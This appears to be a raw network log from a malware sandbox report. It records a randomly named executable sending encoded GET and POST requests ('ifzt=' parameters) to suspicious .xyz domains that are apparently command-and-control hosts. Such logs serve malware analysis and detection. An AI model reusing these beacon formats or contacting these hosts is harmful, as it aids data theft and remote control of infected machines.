                                                                                                                                                Nov 25, 2024 09:44:11.833236933 CET520OUTGET /sba9/?ifzt=hsKab5Z8okOTl8y9Vxbai4viX8bRHhfs9Ucn1wMjIFh0nzefPIjUKnrAgLCbEwixQNq8fslvmu/EEFVEU8GR0KRfEzdZZ5UTmPnT/iR9Rp0TOLJvLqtuatI=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.izmirescortg.xyz
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:44:13.150933027 CET1102INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:12 GMT
                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lyCgFL5MoDxFe%2F2B8Ls9%2B5Be5Xlj5hgtTh5W1L8Wzc5O4EhuipdKJe1hSMQW%2B6MFAFHWMy4HHVJ0z5PWSHyjU5XZIdSP0Iel3Z7UZ5l8UrwJWgs5PjjG2vBuK%2BUlCUl5gaFBl5CbAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805b03ed547c6c-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1928&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=520&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                25192.168.2.449941161.97.142.144803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:19.076984882 CET783OUTPOST /xd9h/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.030002613.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.030002613.xyz
                                                                                                                                                Referer: http://www.030002613.xyz/xd9h/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 61 4c 61 7a 48 62 52 6c 44 5a 38 57 56 7a 6f 38 32 65 54 6e 76 5a 63 5a 30 36 50 4e 68 69 47 43 55 34 6a 59 51 54 6a 4f 47 77 79 62 6b 36 71 79 58 4d 2f 6c 61 65 47 52 35 34 75 54 46 69 74 78 31 34 38 37 49 30 6f 43 6d 53 4e 54 2f 46 4e 49 50 76 32 75 58 30 2b 35 30 7a 54 39 67 59 47 71 2b 38 44 71 57 51 72 57 37 7a 79 59 53 64 4f 64 38 58 70 2b 38 2b 30 76 65 52 41 71 63 4a 78 74 6a 38 71 4a 32 46 5a 7a 36 49 71 76 6f 42 76 6e 6a 6b 58 55 79 7a 4d 47 7a 65 39 43 46 33 4e 32 70 62 34 35 45 4b 4a 66 53 75 4e 59 5a 6b 76 54 37 36 50 64 52 57 56 61 31 4a 73 5a 58 32 6a 73 43 41 3d 3d
                                                                                                                                                Data Ascii: ifzt=aLazHbRlDZ8WVzo82eTnvZcZ06PNhiGCU4jYQTjOGwybk6qyXM/laeGR54uTFitx1487I0oCmSNT/FNIPv2uX0+50zT9gYGq+8DqWQrW7zyYSdOd8Xp+8+0veRAqcJxtj8qJ2FZz6IqvoBvnjkXUyzMGze9CF3N2pb45EKJfSuNYZkvT76PdRWVa1JsZX2jsCA==
                                                                                                                                                Nov 25, 2024 09:44:20.346652031 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:20 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                ETag: W/"66cce1df-b96"
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                                Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                                Nov 25, 2024 09:44:20.346684933 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                                Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                26192.168.2.449948161.97.142.144803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:21.822097063 CET803OUTPOST /xd9h/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.030002613.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.030002613.xyz
                                                                                                                                                Referer: http://www.030002613.xyz/xd9h/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 61 4c 61 7a 48 62 52 6c 44 5a 38 57 56 54 59 38 30 35 50 6e 2b 70 63 57 37 61 50 4e 32 79 47 65 55 34 76 59 51 53 6d 56 47 6d 69 62 6c 59 69 79 55 4a 66 6c 64 65 47 52 71 34 75 57 4c 43 74 2b 31 34 77 4e 49 32 73 43 6d 53 5a 54 2f 45 64 49 4d 5a 2b 78 57 6b 2b 33 2f 54 54 37 6b 59 47 71 2b 38 44 71 57 52 4f 7a 37 33 57 59 52 74 65 64 39 7a 64 35 2f 2b 30 67 54 42 41 71 59 4a 77 6b 6a 38 71 33 32 45 46 4a 36 4b 53 76 6f 45 4c 6e 6a 31 58 62 70 6a 4d 36 74 75 39 55 55 6c 4d 63 6d 71 5a 53 4d 62 68 6e 55 73 39 50 56 43 69 4a 71 4c 75 4b 44 57 78 70 6f 4f 6c 74 61 31 65 6c 5a 43 58 33 51 58 53 57 31 42 62 68 39 63 64 75 56 2b 55 35 6e 30 38 3d
                                                                                                                                                Data Ascii: ifzt=aLazHbRlDZ8WVTY805Pn+pcW7aPN2yGeU4vYQSmVGmiblYiyUJfldeGRq4uWLCt+14wNI2sCmSZT/EdIMZ+xWk+3/TT7kYGq+8DqWROz73WYRted9zd5/+0gTBAqYJwkj8q32EFJ6KSvoELnj1XbpjM6tu9UUlMcmqZSMbhnUs9PVCiJqLuKDWxpoOlta1elZCX3QXSW1Bbh9cduV+U5n08=
                                                                                                                                                Nov 25, 2024 09:44:23.073374987 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:22 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                ETag: W/"66cce1df-b96"
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                                Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                                Nov 25, 2024 09:44:23.073443890 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                                Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                27192.168.2.449954161.97.142.144803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:24.731765032 CET10885OUTPOST /xd9h/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.030002613.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.030002613.xyz
                                                                                                                                                Referer: http://www.030002613.xyz/xd9h/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 61 4c 61 7a 48 62 52 6c 44 5a 38 57 56 54 59 38 30 35 50 6e 2b 70 63 57 37 61 50 4e 32 79 47 65 55 34 76 59 51 53 6d 56 47 6d 71 62 6c 74 32 79 57 6f 66 6c 63 65 47 52 70 34 75 58 4c 43 74 5a 31 34 6f 52 49 32 67 53 6d 51 68 54 2f 6d 46 49 4e 72 57 78 59 6b 2b 33 77 7a 54 36 67 59 47 37 2b 38 7a 55 57 51 2b 7a 37 33 57 59 52 72 36 64 37 6e 70 35 35 2b 30 76 65 52 41 75 63 4a 77 49 6a 38 7a 4d 32 45 51 30 36 2b 6d 76 72 6b 62 6e 77 54 44 62 6c 6a 4d 43 73 75 38 58 55 6c 41 48 6d 71 56 30 4d 62 6c 42 55 76 68 50 44 6c 7a 45 36 61 79 4f 66 31 5a 51 2b 75 56 4f 63 32 43 44 41 42 69 58 65 47 4b 36 72 6c 50 6b 36 4d 67 35 43 37 41 4a 78 69 2b 7a 7a 73 59 68 74 61 51 75 75 4f 59 59 4c 54 50 79 34 36 44 57 38 2b 46 43 76 59 66 36 78 32 59 30 79 35 64 53 7a 34 6f 6a 63 67 39 46 53 59 69 4a 71 6c 2f 67 48 38 79 53 33 36 48 45 78 58 73 55 39 4b 78 4d 71 2b 47 56 67 51 52 69 73 39 33 4c 74 6a 35 6d 50 79 70 64 57 34 6d 77 6e 44 50 6f 49 44 6d 5a 39 7a 50 45 42 7a 6a 53 45 54 5a 55 34 63 2f 70 70 [TRUNCATED]
                                                                                                                                                Data Ascii: ifzt=aLazHbRlDZ8WVTY805Pn+pcW7aPN2yGeU4vYQSmVGmqblt2yWoflceGRp4uXLCtZ14oRI2gSmQhT/mFINrWxYk+3wzT6gYG7+8zUWQ+z73WYRr6d7np55+0veRAucJwIj8zM2EQ06+mvrkbnwTDbljMCsu8XUlAHmqV0MblBUvhPDlzE6ayOf1ZQ+uVOc2CDABiXeGK6rlPk6Mg5C7AJxi+zzsYhtaQuuOYYLTPy46DW8+FCvYf6x2Y0y5dSz4ojcg9FSYiJql/gH8yS36HExXsU9KxMq+GVgQRis93Ltj5mPypdW4mwnDPoIDmZ9zPEBzjSETZU4c/pp8a+ISfZZTy2wABVWCm9kEAdCb0IOWHx80vlB1PE10xNQwNJe18yuRp4Su4U1J4QQ6Ulqi6cMYj4HKzZh7xZC+v+9nbSdRUKXEgreS5STITYwKIxG2SOsvdB/IRP/8dJtt6+0lMK15I4vzZkCLBU5vGvLq39gP5bEFCDtRNSTNNF3/Rn0ChMRQgVVBPflVQGO22+R/O5aSWtL5KHQS3avbcli8zW/napciP1o7CR+O2XnBkN6dxx0u5Ipmp31wStOAbdtHTyzXT3S9zI2vPdUVaVwhXppkMNJbuAifJYfUUKaocEShf6ftv+Q4GzVun1josGQW+K1D/UQGwUg+i8BrPbBJwPeRpLHFffkO/eyrLZSGUSGvGf3v3eDrxhBOrBd4WAVOG6XG9NiyDej/Dxz4+1GhJ2OzLMRZ0bIDHPEVkvyvy6sg6uIResi9qWaicBdVYJdJnsOE+ZA3Jfi1dwacTw/1V8/mtXya+GS90xT7sEhK0xN7Kn3dm9w0P8aAwkcUXXj6GOZKCd2U+/eDzPonBqITIjpCrjoyknR+O5Cu96DjJYzrZgAqV6q+otRvrB2PNGi+xsYxKf61bN5iIgh4xmV4sW5Pwm5LEmoRTX+qffTehQYPNROhiKZ/ZP2ift0oUub7ISi76PJFNVVbnIm/VQWGs0n9ISSFb [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:44:25.813674927 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:25 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                ETag: W/"66cce1df-b96"
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                                Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                                Nov 25, 2024 09:44:25.813745975 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                                Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                28192.168.2.449961161.97.142.144803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:44:27.455677986 CET517OUTGET /xd9h/?ifzt=XJyTEs9GXoAybgJL3Lz0/JwH+eiTm1uUb57LZhSSXQP8iaO5Q6m7cM20hY6MGSJfub8ibR0rowNO83l3EomIXmC1+i3fga28+sLpZTTW/AC/fI2RjxZA+PI=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.030002613.xyz
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:44:28.762455940 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:28 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Content-Length: 2966
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                ETag: "66cce1df-b96"
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:44:28.762536049 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
